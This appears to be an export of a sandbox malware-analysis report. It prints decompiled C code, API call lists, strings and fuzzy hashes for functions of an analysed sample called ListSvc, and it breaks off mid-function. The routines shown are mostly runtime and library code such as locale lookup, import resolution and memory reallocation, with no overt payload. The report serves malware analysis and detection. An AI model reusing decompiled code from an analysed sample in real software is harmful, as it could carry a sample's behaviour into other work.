Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$LocaleValid
String ID: en-US,en,
API String ID: 975949045-3579323720
Opcode ID: e3721d42ea745a9edd8ebaecb4ab5b2828546a05d0e92c0f55165f56426ca85b
Instruction ID: af4c48ae6f9d4b9345a2e7437780db60bfff4a38cfd5d6d0e3948ff18df55379
Opcode Fuzzy Hash: e3721d42ea745a9edd8ebaecb4ab5b2828546a05d0e92c0f55165f56426ca85b
Instruction Fuzzy Hash: 31218461B1031077DA11BB668C03B5E29A89B44705BA0887BB140B32D2EEBD8D52D66F

Uniqueness

Uniqueness Score: -1.00%

Function 0042301C, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82
registryCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E0042301C(void* __ebx, void* __esi, void* __eflags) {
				char _v8;
				void* _v12;
				char _v16;
				char _v20;
				intOrPtr* _t21;
				intOrPtr _t61;
				void* _t68;

				_push(__ebx);
				_v20 = 0;
				_v8 = 0;
				_push(_t68);
				_push(0x423116);
				_push( *[fs:eax]);
				 *[fs:eax] = _t68 + 0xfffffff0;
				_t21 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"GetUserDefaultUILanguage");
				if(_t21 == 0) {
					if(E0041FF2C() != 2) {
						if(E00422FF4(0, L"Control Panel\\Desktop\\ResourceLocale", 0x80000001,  &_v12, 1, 0) == 0) {
							E00422FE8();
							RegCloseKey(_v12);
						}
					} else {
						if(E00422FF4(0, L".DEFAULT\\Control Panel\\International", 0x80000003,  &_v12, 1, 0) == 0) {
							E00422FE8();
							RegCloseKey(_v12);
						}
					}
					E0040873C( &_v20, _v8, 0x42322c);
					E00405920(_v20,  &_v16);
					if(_v16 != 0) {
					}
				} else {
					 *_t21();
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0042311D);
				E00407A20( &_v20);
				return E00407A20( &_v8);
			}

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00423116), ref: 00423043

Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2

RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00423116), ref: 00423096

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 004230A5
kernel32.dll, xrefs: 0042303E
.DEFAULT\Control Panel\International, xrefs: 0042306D
GetUserDefaultUILanguage, xrefs: 00423039
Locale, xrefs: 00423085

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: AddressCloseHandleModuleProc
String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
API String ID: 4190037839-2401316094
Opcode ID: 0c53a133d6644a1b94ef3c959f72937b5652b11bdcaf1ce6cf384129006bdbe5
Instruction ID: 05790bdd6973bc135d390eb6e5b6569f0703c8ea8b4006eead18837270f0a894
Opcode Fuzzy Hash: 0c53a133d6644a1b94ef3c959f72937b5652b11bdcaf1ce6cf384129006bdbe5
Instruction Fuzzy Hash: 39217930B00228ABDB10EEB5DD42A9F73F4EB44345FA04477A500E3281DB7CAB41962D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D218, Relevance: 13.8, APIs: 9, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040D218(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				long _v8;
				signed int _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				struct HINSTANCE__** _v48;
				CHAR* _v52;
				void _v56;
				long _v60;
				_Unknown_base(*)()* _v64;
				struct HINSTANCE__* _v68;
				CHAR* _v72;
				signed int _v76;
				CHAR* _v80;
				intOrPtr* _v84;
				void* _v88;
				void _v92;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				long _t113;
				intOrPtr* _t119;
				void* _t124;
				void _t126;
				long _t128;
				struct HINSTANCE__* _t142;
				long _t166;
				signed int* _t190;
				_Unknown_base(*)()* _t191;
				void* _t194;
				intOrPtr _t196;

				_push(_a4);
				memcpy( &_v56, 0x4b7c40, 8 << 2);
				_pop(_t194);
				_v56 =  *0x4b7c40;
				_v52 = E0040D6C8( *0x004B7C44);
				_v48 = E0040D6D8( *0x004B7C48);
				_v44 = E0040D6E8( *0x004B7C4C);
				_v40 = E0040D6F8( *0x004B7C50);
				_v36 = E0040D6F8( *0x004B7C54);
				_v32 = E0040D6F8( *0x004B7C58);
				_v28 =  *0x004B7C5C;
				memcpy( &_v92, 0x4b7c60, 9 << 2);
				_t196 = _t194;
				_v88 = 0x4b7c60;
				_v84 = _a8;
				_v80 = _v52;
				if((_v56 & 0x00000001) == 0) {
					_t166 =  *0x4b7c84; // 0x0
					_v8 = _t166;
					_v8 =  &_v92;
					RaiseException(0xc06d0057, 0, 1,  &_v8);
					return 0;
				}
				_t104 = _a8 - _v44;
				_t142 =  *_v48;
				if(_t104 < 0) {
					_t104 = _t104 + 3;
				}
				_v12 = _t104 >> 2;
				_t106 = _v12;
				_t190 = (_t106 << 2) + _v40;
				_t108 = (_t106 & 0xffffff00 | (_t190[0] & 0x00000080) == 0x00000000) & 0x00000001;
				_v76 = _t108;
				if(_t108 == 0) {
					_v72 =  *_t190 & 0x0000ffff;
				} else {
					_v72 = E0040D708( *_t190) + 2;
				}
				_t191 = 0;
				if( *0x4be640 == 0) {
					L10:
					if(_t142 != 0) {
						L25:
						_v68 = _t142;
						if( *0x4be640 != 0) {
							_t191 =  *0x4be640(2,  &_v92);
						}
						if(_t191 != 0) {
							L36:
							if(_t191 == 0) {
								_v60 = GetLastError();
								if( *0x4be644 != 0) {
									_t191 =  *0x4be644(4,  &_v92);
								}
								if(_t191 == 0) {
									_t113 =  *0x4b7c8c; // 0x0
									_v24 = _t113;
									_v24 =  &_v92;
									RaiseException(0xc06d007f, 0, 1,  &_v24);
									_t191 = _v64;
								}
							}
							goto L41;
						} else {
							if( *((intOrPtr*)(_t196 + 0x14)) == 0 ||  *((intOrPtr*)(_t196 + 0x1c)) == 0) {
								L35:
								_t191 = GetProcAddress(_t142, _v72);
								goto L36;
							} else {
								_t119 =  *((intOrPtr*)(_t142 + 0x3c)) + _t142;
								if( *_t119 != 0x4550 ||  *((intOrPtr*)(_t119 + 8)) != _v28 || (( *(_t119 + 0x34) & 0xffffff00 |  *(_t119 + 0x34) == _t142) & 0x00000001) == 0) {
									goto L35;
								} else {
									_t191 =  *((intOrPtr*)(_v36 + _v12 * 4));
									if(_t191 == 0) {
										goto L35;
									}
									L41:
									 *_a8 = _t191;
									goto L42;
								}
							}
						}
					}
					if( *0x4be640 != 0) {
						_t142 =  *0x4be640(1,  &_v92);
					}
					if(_t142 == 0) {
						_t142 = LoadLibraryA(_v80);
					}
					if(_t142 != 0) {
						L20:
						if(_t142 == E0040CBA0(_v48, _t142)) {
							FreeLibrary(_t142);
						} else {
							if( *((intOrPtr*)(_t196 + 0x18)) != 0) {
								_t124 = LocalAlloc(0x40, 8);
								_v20 = _t124;
								if(_t124 != 0) {
									 *((intOrPtr*)(_v20 + 4)) = _t196;
									_t126 =  *0x4b7c3c; // 0x0
									 *_v20 = _t126;
									 *0x4b7c3c = _v20;
								}
							}
						}
						goto L25;
					} else {
						_v60 = GetLastError();
						if( *0x4be644 != 0) {
							_t142 =  *0x4be644(3,  &_v92);
						}
						if(_t142 != 0) {
							goto L20;
						} else {
							_t128 =  *0x4b7c88; // 0x0
							_v16 = _t128;
							_v16 =  &_v92;
							RaiseException(0xc06d007e, 0, 1,  &_v16);
							return _v64;
						}
					}
				} else {
					_t191 =  *0x4be640(0,  &_v92);
					if(_t191 == 0) {
						goto L10;
					} else {
						L42:
						if( *0x4be640 != 0) {
							_v60 = 0;
							_v68 = _t142;
							_v64 = _t191;
							 *0x4be640(5,  &_v92);
						}
						return _t191;
					}
				}
			}

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0040D2D0

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 4fdbadfbff537c598349848257c7330453a14fb024132e1a583ffc8385a63ee1
Instruction ID: 6bdc8742f8c12d3c05e6aa795b4e0fa0c425ed74332de7fca684440f38d882f1
Opcode Fuzzy Hash: 4fdbadfbff537c598349848257c7330453a14fb024132e1a583ffc8385a63ee1
Instruction Fuzzy Hash: 7CA16F75D002089FDB14DFE9D881BAEB7B5BB88300F14423AE505B73C1DB78A949CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004047B0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
fileCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004047B0(int __eax, void* __ecx, void* __edx) {
				long _v12;
				int _t4;
				long _t7;
				void* _t11;
				long _t12;
				void* _t13;
				long _t18;

				_t4 = __eax;
				_t24 = __edx;
				_t20 = __eax;
				if( *0x4bb058 == 0) {
					_push(0x2010);
					_push(__edx);
					_push(__eax);
					_push(0);
					L00403780();
				} else {
					_t7 = E00407EF0(__edx);
					WriteFile(GetStdHandle(0xfffffff4), _t24, _t7,  &_v12, 0);
					_t11 =  *0x4b7078; // 0x403920
					_t12 = E00407EF0(_t11);
					_t13 =  *0x4b7078; // 0x403920
					WriteFile(GetStdHandle(0xfffffff4), _t13, _t12,  &_v12, 0);
					_t18 = E00407EF0(_t20);
					_t4 = WriteFile(GetStdHandle(0xfffffff4), _t20, _t18,  &_v12, 0);
				}
				return _t4;
			}

APIs

GetStdHandle.KERNEL32(000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047D2
WriteFile.KERNEL32(00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047D8
GetStdHandle.KERNEL32(000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047F7
WriteFile.KERNEL32(00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047FD
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?), ref: 00404814
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000), ref: 0040481A

Strings

9@, xrefs: 004047E4, 004047EF

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: FileHandleWrite
String ID: 9@
API String ID: 3320372497-3209974744
Opcode ID: 5f8d133322f34133c732956f1222a9d0eafcb790ac979970e9ef56a2ae19cd1b
Instruction ID: 9b3b4e35e49a927b8991458b20a1a8ec0ccf5b925403b1971dfbe1b0899ab5f0
Opcode Fuzzy Hash: 5f8d133322f34133c732956f1222a9d0eafcb790ac979970e9ef56a2ae19cd1b
Instruction Fuzzy Hash: 2001AEE25492103DE110F7A69C85F57168C8B4472AF10467F7218F35D2C9395D44927E

Uniqueness

Uniqueness Score: -1.00%

Function 0041F0F4, Relevance: 12.1, APIs: 8, Instructions: 97
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E0041F0F4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char* _v8;
				long _v12;
				short _v140;
				short _v2188;
				void* _t15;
				char* _t17;
				intOrPtr _t19;
				intOrPtr _t30;
				long _t48;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t61;
				void* _t64;

				_push(__ebx);
				_push(__esi);
				_v8 = 0;
				_push(_t64);
				_push(0x41f219);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t64 + 0xfffff778;
				_t61 = E0041EEFC(_t15, __ebx,  &_v2188, __edx, __edi, __esi, 0x400);
				_t17 =  *0x4ba6c0; // 0x4bb058
				if( *_t17 == 0) {
					_t19 =  *0x4ba4f8; // 0x40e710
					_t11 = _t19 + 4; // 0xffed
					LoadStringW(E00409FF0( *0x4be634),  *_t11,  &_v140, 0x40);
					MessageBoxW(0,  &_v2188,  &_v140, 0x2010);
				} else {
					_t30 =  *0x4ba524; // 0x4bb340
					E00405564(E00405820(_t30));
					_t48 = WideCharToMultiByte(1, 0,  &_v2188, _t61, 0, 0, 0, 0);
					_push(_t48);
					E00409C00();
					WideCharToMultiByte(1, 0,  &_v2188, _t61, _v8, _t48, 0, 0);
					WriteFile(GetStdHandle(0xfffffff4), _v8, _t48,  &_v12, 0);
					WriteFile(GetStdHandle(0xfffffff4), 0x41f234, 2,  &_v12, 0);
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x41f220);
				_t57 =  *0x41f0c4; // 0x41f0c8
				return E00409D24( &_v8, _t57);
			}

APIs

Part of subcall function 0041EEFC: VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
Part of subcall function 0041EEFC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53
Part of subcall function 0041EEFC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E
Part of subcall function 0041EEFC: LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009

WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,0041F219), ref: 0041F155
WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F188
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F19A
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F1A0
GetStdHandle.KERNEL32(000000F4,0041F234,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 0041F1B4
WriteFile.KERNEL32(00000000,000000F4,0041F234,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 0041F1BA
LoadStringW.USER32(00000000,0000FFED,?,00000040), ref: 0041F1DE
MessageBoxW.USER32(00000000,?,?,00002010), ref: 0041F1F8

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
String ID:
API String ID: 135118572-0
Opcode ID: 7bf27a680bd44ec5315003c7bd75f7b580991028cc1534cfff61cb99441fed85
Instruction ID: 441773961034998e17761d3334fa1b60ae8bad0ad03d42d5622a75f3c8f76c28
Opcode Fuzzy Hash: 7bf27a680bd44ec5315003c7bd75f7b580991028cc1534cfff61cb99441fed85
Instruction Fuzzy Hash: 7D31CF75640204BFE714E796CC42FDA77ACEB08704F9044BABA04F71D2DA786E548B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00404464, Relevance: 10.9, APIs: 7, Instructions: 406
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00404464(signed int __eax, intOrPtr __edx, void* __edi) {
				signed int __ebx;
				void* __esi;
				signed int _t69;
				signed int _t78;
				signed int _t93;
				long _t94;
				void* _t100;
				signed int _t102;
				signed int _t109;
				signed int _t115;
				signed int _t123;
				signed int _t129;
				void* _t131;
				signed int _t140;
				unsigned int _t148;
				signed int _t150;
				long _t152;
				signed int _t156;
				intOrPtr _t161;
				signed int _t166;
				signed int _t170;
				unsigned int _t171;
				intOrPtr _t174;
				intOrPtr _t192;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t205;
				unsigned int _t207;
				intOrPtr _t213;
				void* _t225;
				intOrPtr _t227;
				void* _t228;
				signed int _t230;
				void* _t232;
				signed int _t233;
				signed int _t234;
				signed int _t238;
				signed int _t241;
				void* _t243;
				intOrPtr* _t244;

				_t176 = __edx;
				_t66 = __eax;
				_t166 =  *(__eax - 4);
				_t217 = __eax;
				if((_t166 & 0x00000007) != 0) {
					__eflags = _t166 & 0x00000005;
					if((_t166 & 0x00000005) != 0) {
						_pop(_t217);
						_pop(_t145);
						__eflags = _t166 & 0x00000003;
						if((_t166 & 0x00000003) == 0) {
							_push(_t145);
							_push(__eax);
							_push(__edi);
							_push(_t225);
							_t244 = _t243 + 0xffffffe0;
							_t218 = __edx;
							_t202 = __eax;
							_t69 =  *(__eax - 4);
							_t148 = (0xfffffff0 & _t69) - 0x14;
							if(0xfffffff0 >= __edx) {
								__eflags = __edx - _t148 >> 1;
								if(__edx < _t148 >> 1) {
									_t150 = E00403EE8(__edx);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t218 - 0x40a2c;
										if(_t218 > 0x40a2c) {
											_t78 = _t202 - 0x10;
											__eflags = _t78;
											 *((intOrPtr*)(_t78 + 8)) = _t218;
										}
										E00403AA4(_t202, _t218, _t150);
										E0040426C(_t202, _t202, _t225);
									}
								} else {
									_t150 = __eax;
									 *((intOrPtr*)(__eax - 0x10 + 8)) = __edx;
								}
							} else {
								if(0xfffffff0 <= __edx) {
									_t227 = __edx;
								} else {
									_t227 = 0xbadb9d;
								}
								 *_t244 = _t202 - 0x10 + (_t69 & 0xfffffff0);
								VirtualQuery( *(_t244 + 8), _t244 + 8, 0x1c);
								if( *((intOrPtr*)(_t244 + 0x14)) != 0x10000) {
									L12:
									_t150 = E00403EE8(_t227);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t227 - 0x40a2c;
										if(_t227 > 0x40a2c) {
											_t93 = _t150 - 0x10;
											__eflags = _t93;
											 *((intOrPtr*)(_t93 + 8)) = _t218;
										}
										E00403A74(_t202,  *((intOrPtr*)(_t202 - 0x10 + 8)), _t150);
										E0040426C(_t202, _t202, _t227);
									}
								} else {
									 *(_t244 + 0x10) =  *(_t244 + 0x10) & 0xffff0000;
									_t94 =  *(_t244 + 0x10);
									if(_t218 - _t148 >= _t94) {
										goto L12;
									} else {
										_t152 = _t227 - _t148 + 0x00010000 - 0x00000001 & 0xffff0000;
										if(_t94 < _t152) {
											_t152 = _t94;
										}
										if(VirtualAlloc( *(_t244 + 0xc), _t152, 0x2000, 4) == 0 || VirtualAlloc( *(_t244 + 0xc), _t152, 0x1000, 4) == 0) {
											goto L12;
										} else {
											_t100 = _t202 - 0x10;
											 *((intOrPtr*)(_t100 + 8)) = _t218;
											 *(_t100 + 0xc) = _t152 +  *(_t100 + 0xc) | 0x00000008;
											_t150 = _t202;
										}
									}
								}
							}
							return _t150;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t170 = _t166 & 0xfffffff0;
						_push(__edi);
						_t205 = _t170 + __eax;
						_t171 = _t170 - 4;
						_t156 = _t166 & 0x0000000f;
						__eflags = __edx - _t171;
						_push(_t225);
						if(__edx > _t171) {
							_t102 =  *(_t205 - 4);
							__eflags = _t102 & 0x00000001;
							if((_t102 & 0x00000001) == 0) {
								L75:
								asm("adc edi, 0xffffffff");
								_t228 = ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176;
								_t207 = _t171;
								_t109 = E00403EE8(((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176);
								_t192 = _t176;
								__eflags = _t109;
								if(_t109 == 0) {
									goto L73;
								} else {
									__eflags = _t228 - 0x40a2c;
									if(_t228 > 0x40a2c) {
										 *((intOrPtr*)(_t109 - 8)) = _t192;
									}
									_t230 = _t109;
									E00403A74(_t217, _t207, _t109);
									E0040426C(_t217, _t207, _t230);
									return _t230;
								}
							} else {
								_t115 = _t102 & 0xfffffff0;
								_t232 = _t171 + _t115;
								__eflags = __edx - _t232;
								if(__edx > _t232) {
									goto L75;
								} else {
									__eflags =  *0x4bb059;
									if(__eflags == 0) {
										L66:
										__eflags = _t115 - 0xb30;
										if(_t115 >= 0xb30) {
											E00403AC0(_t205);
											_t176 = _t176;
											_t171 = _t171;
										}
										asm("adc edi, 0xffffffff");
										_t123 = (_t176 + ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
										_t195 = _t232 + 4 - _t123;
										__eflags = _t195;
										if(_t195 > 0) {
											 *(_t217 + _t232 - 4) = _t195;
											 *((intOrPtr*)(_t217 - 4 + _t123)) = _t195 + 3;
											_t233 = _t123;
											__eflags = _t195 - 0xb30;
											if(_t195 >= 0xb30) {
												__eflags = _t123 + _t217;
												E00403B00(_t123 + _t217, _t171, _t195);
											}
										} else {
											 *(_t217 + _t232) =  *(_t217 + _t232) & 0xfffffff7;
											_t233 = _t232 + 4;
										}
										_t234 = _t233 | _t156;
										__eflags = _t234;
										 *(_t217 - 4) = _t234;
										 *0x4bbae8 = 0;
										_t109 = _t217;
										L73:
										return _t109;
									} else {
										while(1) {
											asm("lock cmpxchg [0x4bbae8], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x4bb989;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t176 = _t176;
												_t171 = _t171;
												asm("lock cmpxchg [0x4bbae8], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t176 = _t176;
													_t171 = _t171;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										_t129 =  *(_t205 - 4);
										__eflags = _t129 & 0x00000001;
										if((_t129 & 0x00000001) == 0) {
											L74:
											 *0x4bbae8 = 0;
											goto L75;
										} else {
											_t115 = _t129 & 0xfffffff0;
											_t232 = _t171 + _t115;
											__eflags = _t176 - _t232;
											if(_t176 > _t232) {
												goto L74;
											} else {
												goto L66;
											}
										}
									}
								}
							}
						} else {
							__eflags = __edx + __edx - _t171;
							if(__edx + __edx < _t171) {
								__eflags = __edx - 0xb2c;
								if(__edx >= 0xb2c) {
									L41:
									_t32 = _t176 + 0xd3; // 0xbff
									_t238 = (_t32 & 0xffffff00) + 0x30;
									_t174 = _t171 + 4 - _t238;
									__eflags =  *0x4bb059;
									if(__eflags != 0) {
										while(1) {
											asm("lock cmpxchg [0x4bbae8], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x4bb989;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t174 = _t174;
												asm("lock cmpxchg [0x4bbae8], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t174 = _t174;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										__eflags = 0xf;
									}
									 *(_t217 - 4) = _t156 | _t238;
									_t161 = _t174;
									_t196 =  *(_t205 - 4);
									__eflags = _t196 & 0x00000001;
									if((_t196 & 0x00000001) != 0) {
										_t131 = _t205;
										_t197 = _t196 & 0xfffffff0;
										_t161 = _t161 + _t197;
										_t205 = _t205 + _t197;
										__eflags = _t197 - 0xb30;
										if(_t197 >= 0xb30) {
											E00403AC0(_t131);
										}
									} else {
										 *(_t205 - 4) = _t196 | 0x00000008;
									}
									 *((intOrPtr*)(_t205 - 8)) = _t161;
									 *((intOrPtr*)(_t217 + _t238 - 4)) = _t161 + 3;
									__eflags = _t161 - 0xb30;
									if(_t161 >= 0xb30) {
										E00403B00(_t217 + _t238, _t174, _t161);
									}
									 *0x4bbae8 = 0;
									return _t217;
								} else {
									__eflags = __edx - 0x2cc;
									if(__edx < 0x2cc) {
										_t213 = __edx;
										_t140 = E00403EE8(__edx);
										__eflags = _t140;
										if(_t140 != 0) {
											_t241 = _t140;
											E00403AA4(_t217, _t213, _t140);
											E0040426C(_t217, _t213, _t241);
											_t140 = _t241;
										}
										return _t140;
									} else {
										_t176 = 0xb2c;
										__eflags = _t171 - 0xb2c;
										if(_t171 <= 0xb2c) {
											goto L37;
										} else {
											goto L41;
										}
									}
								}
							} else {
								L37:
								return _t66;
							}
						}
					}
				} else {
					__ebx =  *__ecx;
					__ecx =  *(__ebx + 2) & 0x0000ffff;
					__ecx = ( *(__ebx + 2) & 0x0000ffff) - 4;
					__eflags = __ecx - __edx;
					if(__ecx < __edx) {
						__ecx = __ecx + __ecx + 0x20;
						_push(__edi);
						__edi = __edx;
						__eax = 0;
						__ecx = __ecx - __edx;
						asm("adc eax, 0xffffffff");
						__eax = 0 & __ecx;
						__eax = (0 & __ecx) + __edx;
						__eax = E00403EE8((0 & __ecx) + __edx);
						__eflags = __eax;
						if(__eax != 0) {
							__eflags = __edi - 0x40a2c;
							if(__edi > 0x40a2c) {
								 *(__eax - 8) = __edi;
							}
							 *(__ebx + 2) & 0x0000ffff = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__eflags = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__edx = __eax;
							__edi = __eax;
							 *((intOrPtr*)(__ebx + 0x1c))() = E0040426C(__esi, __edi, __ebp);
							__eax = __edi;
						}
						_pop(__edi);
						_pop(__esi);
						_pop(__ebx);
						return __eax;
					} else {
						__ebx = 0x40 + __edx * 4;
						__eflags = 0x40 + __edx * 4 - __ecx;
						if(0x40 + __edx * 4 < __ecx) {
							__ebx = __edx;
							__eax = __edx;
							__eax = E00403EE8(__edx);
							__eflags = __eax;
							if(__eax != 0) {
								__ecx = __ebx;
								__edx = __eax;
								__ebx = __eax;
								__esi = E0040426C(__esi, __edi, __ebp);
								__eax = __ebx;
							}
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						} else {
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec1625ffc2fe51f8c31513aba64e24c59fd6eccf0fed4d7fd9cb209259156b9f
Instruction ID: a6f3f7862a5743fd60f07ae337b35688b7a953487e66f12862dc3ba09d14b1d9
Opcode Fuzzy Hash: ec1625ffc2fe51f8c31513aba64e24c59fd6eccf0fed4d7fd9cb209259156b9f
Instruction Fuzzy Hash: 8CC115A27106000BD714AE7DDD8476AB68A9BC5716F28827FF244EB3D6DB7CCD418388

Uniqueness

Uniqueness Score: -1.00%

Function 0041F7A0, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0041F7A0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				short _v558;
				char _v564;
				intOrPtr _v568;
				char _v572;
				char _v576;
				char _v580;
				intOrPtr _v584;
				char _v588;
				void* _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				intOrPtr _v612;
				char _v616;
				char _v620;
				char _v624;
				void* _v628;
